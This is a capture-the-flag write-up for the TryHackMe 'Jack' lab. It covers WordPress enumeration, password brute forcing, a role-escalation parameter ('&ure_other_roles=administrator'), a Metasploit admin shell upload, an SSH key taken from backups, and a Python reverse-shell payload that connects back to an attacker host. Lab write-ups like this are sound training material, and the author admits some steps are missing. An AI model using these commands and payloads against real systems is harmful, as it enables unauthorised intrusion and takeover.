A challenging room from tryhackme
PLEASE NOTE THERE ARE A LOT OF ISSUES WITH THIS WRITEUP. EVEN THOUGH I GOT ROOT FLAG AT THE END, IT WASN’T THE INTENDED WAY AND I MISSED A LOT OF IMPORTANT DETAILS. FOR A MORE DETAILED WRITEUP PLEASE WATCH OPTIONAL’S: https://youtu.be/xV42XUetrS4
I’m not one for writing writeups but here goes nothing. I saw this room at first a while back when I was still on Kali. Now, I’ve migrated to blackarch and I can confidently say that it’s a whole different world. This writeup is for the “Jack” room. I found the room pretty difficult, especially that there were no writeups for it and not a lot of people have done it.
If you get stuck in this room during enumeration or privilege escalation, consider trying harder. Trust me, it’s satisfying and worth it at the end.
Pre-Setup
This is optional but, I find it useful. Go ahead and add jack.thm to the /etc/hosts file.
Enumeration
Let’s start as we normally would, the ol’ nmap scan… If you’re confused here please leave before you’re too far gone. I output all my nmap scan in a directory called “nmap”.
nmap -T4 -sS -sC -sV -oA nmap/initial jack.thm
The scan shows us a few useful things. There is an open SSH port. I tried to SSH into this but obviously, we don’t have the password, darn! Let’s check out this website though. I immediately see that there is a /wp-admin/ directory, indicating that this is a Wordpress site. Knowing that, I can start wpscan right away. Let’s also enumerate users and plugins.
wpscan -e u,ap --url http://jack.thm
Ok, we get a few great results. There is an xmlrpc.php file, meaning we can use that to brute force a password. We also get a few usernames, this is looking really good for us. I put these usernames in a users.txt for later use.
Because we couldn’t find any plugins, there is no point for an exploit. I researched exploits for this Wordpress version and didn’t find anything. I asked people who completed this box and they said the way to go is to brute force. Let’s use that users.txt file that we made earlier.
wpscan --url http://jack.thm/ -t 3 -P rockyou.txt -U users.txtI let this run for a bit and after an hour, I got bored. This was obviously the wrong wordlist. I followed up on the Jack tryhackme forums and someone said that the wordlist is much shorter, not the standard rockyou. Good thing that I had an extra Kali VM laying around because, without it, I would be screwed. I copied over the shorter wordlist and we got a login!
YES! That was the best feeling. Don’t worry, I also got stuck at this stage. Let’s login with the credentials we found.
Exploitation
At first, I thought there would be a way we can upload a reverse shell through the posts. But there is a number of reasons wrong with that. I took a look at the hint for the user flag and at it said “ure_other_roles” at the end.
A quick Duckduckgo search told me that this was a Wordpress plugin for managing user privileges. Bingo! I found a Metasploit exploit for this plugin on exploit-db at https://exploit-db.com/exploits/44595. Upon running this exploit, it didn’t work. I even tried to edit the source, but nothing. Luckily, I found a useful article: https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/.
We open up burp and connect to the proxy. Change anything (I changed the bio) in the Profile section on the Wordpress dashboard and click “Update Profile”. We get a response.
Type this in at the end, as mentioned in the article, and forward all the requests.
&ure_other_roles=administrator
Looks like we got admin! I went ahead and changed the current user default role as “Administrator” just so that we don’t lose this.
With this, we can now run Metasploit and use exploit/unix/webapp/wp_admin_shell_upload. Set all the required options and run it.
One weird thing I found was that we are not a real directory. First, do ‘cd ..’. Then, type “shell” to open up a system shell. Let’s use python to get an upgraded bash shell.
python -c 'import pty; pty.spawn("/bin/bash")'Let’s go into the home directory and get our first flag!
Privilege Escalation
So right now we have a very low privilege user. The reminder file in the directory of the user flag indicates there should be something in backups. Let’s cd into /var/backups.
Looks like there is id_rsa key. Remember there was an open ssh port? We can use this to log in to the Jack account on ssh.
Looks like with this account we can write to many more directories. Let’s upload a linpeas to see more.
printf "import os\nimport pty\nimport socket\nZIP_DEFLATED=0\nclass ZipFile:\n def close(*args):return\n def write(*args): return\n def __init__(self, *args):return\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('LHOST',LPORT))\nos.dup2(s.fileno(),0)\nos.dup2(s.fileno(),1)\nos.dup2(s.fileno(),2)\nos.putenv('HISTFILE','/dev/null')\npty.spawn('/bin/bash')\ns.close()" > text.pyThat’s it! Wasn’t that hard, right? If you found any other ways of exploiting this system or you think I did something wrong, feel free to ask me! I’m @kyryloren on tryhackme.
Look out for more writeups as I improve my haxor skillz.